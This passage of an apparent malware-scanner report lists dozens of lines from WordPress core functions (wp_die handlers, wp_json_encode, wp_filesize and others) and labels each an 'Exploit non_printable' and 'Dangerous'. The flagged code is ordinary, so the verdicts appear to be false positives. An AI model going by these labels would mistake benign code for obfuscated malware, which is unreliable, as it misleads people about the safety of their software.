<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_maybe_decline_date</span><span style="color: #007700">( </span><span style="color: #0000BB">$date</span><span style="color: #007700">, </span><span style="color: #0000BB">$format </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3428</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">[] Array </span><span style="color: #0000BB">of mime types keyed by the file extension regex corresponding</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 342</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions are not available in SHORTINIT mode</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3430</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_get_mime_types</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 343</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'_x' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3564</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array[] </span><span style="color: #0000BB">Multi</span><span style="color: #007700">-</span><span style="color: #0000BB">dimensional </span><span style="color: #007700">array </span><span style="color: #0000BB">of file extensions types keyed by the type of file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3566</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_get_ext_types</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3598</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">filesize</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 35</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mysql2date</span><span style="color: #007700">( </span><span style="color: #0000BB">$format</span><span style="color: #007700">, </span><span style="color: #0000BB">$date</span><span style="color: #007700">, </span><span style="color: #0000BB">$translate </span><span style="color: #007700">= </span><span style="color: #0000BB">true </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3601</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">int The size of the file in bytes</span><span style="color: #007700">, or </span><span style="color: #0000BB">0 in the event of an error</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3603</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_filesize</span><span style="color: #007700">( </span><span style="color: #0000BB">$path </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3605</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is run</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3609</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returning an int from the callback bypasses the filesize call</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3615</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$size</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3628</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (int) </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'wp_filesize'</span><span style="color: #007700">, </span><span style="color: #0000BB">$size</span><span style="color: #007700">, </span><span style="color: #0000BB">$path </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3640</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_allowed_mime_types</span><span style="color: #007700">( </span><span style="color: #0000BB">$user </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3644</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'current_user_can' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3660</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'upload_mimes'</span><span style="color: #007700">, </span><span style="color: #0000BB">$t</span><span style="color: #007700">, </span><span style="color: #0000BB">$user </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3673</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_nonce_ays</span><span style="color: #007700">( </span><span style="color: #0000BB">$action </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3716</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">complements the </span><span style="color: #007700">`</span><span style="color: #DD0000">die()</span><span style="color: #007700">` </span><span style="color: #0000BB">PHP </span><span style="color: #007700">function. </span><span style="color: #0000BB">The difference is that</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3719</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">very often</span><span style="color: #007700">, and try </span><span style="color: #0000BB">to handle </span><span style="color: #007700">as </span><span style="color: #0000BB">many errors </span><span style="color: #007700">as </span><span style="color: #0000BB">possible</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3761</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_die</span><span style="color: #007700">( </span><span style="color: #0000BB">$message </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$title </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3777</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">name</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 37</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3809</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'is_feed' </span><span style="color: #007700">) && </span><span style="color: #0000BB">is_feed</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3810</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'is_comment_feed' </span><span style="color: #007700">) && </span><span style="color: #0000BB">is_comment_feed</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3811</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'is_trackback' </span><span style="color: #007700">) && </span><span style="color: #0000BB">is_trackback</span><span style="color: #007700">() ) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3847</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_default_wp_die_handler</span><span style="color: #007700">( </span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$title </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3865</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'__' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3869</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'esc_url' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3896</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'language_attributes' </span><span style="color: #007700">) && </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'is_rtl' </span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3907</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'wp_robots' </span><span style="color: #007700">) && </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'wp_robots_no_robots' </span><span style="color: #007700">) && </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'add_filter' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4049</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_ajax_wp_die_handler</span><span style="color: #007700">( </span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$title </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4091</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_json_wp_die_handler</span><span style="color: #007700">( </span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$title </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4133</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_jsonp_wp_die_handler</span><span style="color: #007700">( </span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$title </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4181</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_xmlrpc_wp_die_handler</span><span style="color: #007700">( </span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$title </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4211</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_xml_wp_die_handler</span><span style="color: #007700">( </span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$title </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 423</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string Converted number in string format</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4256</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_scalar_wp_die_handler</span><span style="color: #007700">( </span><span style="color: #0000BB">$message </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$title </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 425</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">number_format_i18n</span><span style="color: #007700">( </span><span style="color: #0000BB">$number</span><span style="color: #007700">, </span><span style="color: #0000BB">$decimals </span><span style="color: #007700">= </span><span style="color: #0000BB">0 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4288</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_wp_die_process_input</span><span style="color: #007700">( </span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$title </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4303</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'is_wp_error' </span><span style="color: #007700">) && </span><span style="color: #0000BB">is_wp_error</span><span style="color: #007700">( </span><span style="color: #0000BB">$message </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4351</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'is_rtl' </span><span style="color: #007700">) && </span><span style="color: #0000BB">is_rtl</span><span style="color: #007700">() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4360</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array( </span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$title</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4375</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">false The JSON encoded string</span><span style="color: #007700">, or </span><span style="color: #0000BB">false </span><span style="color: #007700">if </span><span style="color: #0000BB">it cannot be encoded</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4377</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_json_encode</span><span style="color: #007700">( </span><span style="color: #0000BB">$value</span><span style="color: #007700">, </span><span style="color: #0000BB">$flags </span><span style="color: #007700">= </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$depth </span><span style="color: #007700">= </span><span style="color: #0000BB">512 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4382</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$json</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4391</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">json_encode</span><span style="color: #007700">( </span><span style="color: #0000BB">$value</span><span style="color: #007700">, </span><span style="color: #0000BB">$flags</span><span style="color: #007700">, </span><span style="color: #0000BB">$depth </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4407</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">mixed The sanitized data that shall be encoded to JSON</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4409</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_wp_json_sanity_check</span><span style="color: #007700">( </span><span style="color: #0000BB">$value</span><span style="color: #007700">, </span><span style="color: #0000BB">$depth </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 444</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4451</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">_wp_json_convert_string</span><span style="color: #007700">( </span><span style="color: #0000BB">$value </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4453</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
